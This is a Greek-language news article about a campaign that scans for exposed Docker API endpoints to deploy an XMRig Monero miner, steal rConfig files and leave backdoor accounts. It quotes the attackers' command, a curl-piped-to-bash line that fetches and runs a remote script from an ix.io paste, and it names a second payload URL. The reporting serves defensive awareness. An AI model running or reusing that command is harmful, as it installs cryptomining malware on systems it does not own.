Ερευνητές ανακάλυψαν ότι μια hacking ομάδα σαρώνει μαζικά το διαδίκτυο αναζητώντας Docker πλατφόρμες που έχουν API endpoints εκτεθειμένα στο διαδίκτυο.
Οι hackers κάνουν τις σαρώσεις με σκοπό να αναπτύξουν ένα cryptominer στις εκτεθειμένες Docker πλατφόρμες και να κλέψουν χρήματα.
Επαγγελματίες πίσω από την hacking εκστρατεία
Σύμφωνα με τους ερευνητές, η εκστρατεία μαζικής σάρωσης του διαδικτύου ξεκίνησε το Σαββατοκύριακο στις 24 Νοεμβρίου. Αμέσως τράβηξε την προσοχή των ερευνητών λόγω της τεράστιας έκτασής της.
Ο Troy Mursch, επικεφαλής ερευνητής και συνιδρυτής της Bad Packets LLC, είπε ότι η εκμετάλλευση εκτεθειμένων Docker πλατφορμών δεν είναι κάτι καινούργιο. Συμβαίνει συχνά.
“Αυτό που ξεχώρισε αυτή την εκστρατεία ήταν το μεγάλο εύρος της σάρωσης. Αυτό από μόνο του απαιτούσε περαιτέρω έρευνα για να μάθουμε πού στοχεύει αυτό το botnet“, ανέφερε.
Τι πληροφορίες έχουμε μέχρι τώρα;
Προς το παρόν, οι ερευνητές έχουν ανακαλύψει ότι η hacking ομάδα, που είναι υπεύθυνη γι’ αυτή την εκστρατεία, έχει ήδη σαρώσει περισσότερα από 59.000 IP δίκτυα (netblocks) αναζητώντας εκτεθειμένες Docker πλατφόρμες.
Αν εντοπιστεί κάποιο ευάλωτο μηχάνημα, οι hackers χρησιμοποιούν το API endpoint για να ξεκινήσουν ένα Alpine Linux OS container, όπου εκτελούν την ακόλουθη εντολή:
chroot / mnt / bin / sh -c ‘curl-sL4 http://ix.io/1XQa | bash;
Αυτή η εντολή κατεβάζει και εκτελεί ένα Bash script από τον server των εισβολέων. Αυτό το script εγκαθιστά, στη συνέχεια, ένα crypotminer XMRRig. Σύμφωνα με τον Mursch, κατά τη διάρκεια του Σαββατοκύριακου, οι hackers έκλεψαν 14,82 νομίσματα Monero (XMR), αξίας μόλις 740 δολαρίων.
Κάτι άλλο που παρατήρησαν οι ερευνητές, είναι ότι το κακόβουλο λογισμικό που εγκαθιστούν οι hackers, διαθέτει ένα μέτρο αυτοάμυνας.
“Μία μοναδική αλλά ενδιαφέρουσα λειτουργία της εκστρατείας αυτής είναι ότι κάνει απεγκατάσταση γνωστών προγραμμάτων παρακολούθησης και «σκοτώνει» διάφορες διαδικασίες, μέσω ενός script που κατεβαίνει από το http: // ix [.] Io / 1XQh,”, είπε ο Mursch.
Αυτό το script απενεργοποιεί τα προϊόντα ασφαλείας, αλλά και διαδικασίες, που σχετίζονται με αντίπαλα cryptomining botnet, όπως το DDG.
Επιπλέον, ο Mursch ανακάλυψε ότι το κακόβουλο script έχει μια άλλη λειτουργία, η οποία σαρώνει τον μολυσμένο υπολογιστή αναζητώντας rConfig configuration files. Το script κρυπτογραφεί και κλέβει τα αρχεία και τα στέλνει στον command and control server των επιτιθέμενων.
Ο Craig H. Rowland, ιδρυτής της Sandfly Security, παρατήρησε, ακόμα, ότι οι hackers δημιουργούν backdoor accounts στα hacked containers και αφήνουν πίσω SSH κλειδιά ώστε να έχουν ευκολότερη πρόσβαση και να μπορούν να ελέγξουν απομακρυσμένα όλα τα μολυσμένα bots.
Προς το παρόν, ο Mursch προτείνει σε όλους τους χρήστες και τις εταιρείες, που τρέχουν Docker πλατφόρμες, να ελέγξουν αν υπάρχουν εκτεθειμένα API endpoints στο διαδίκτυο και να δράσουν άμεσα.
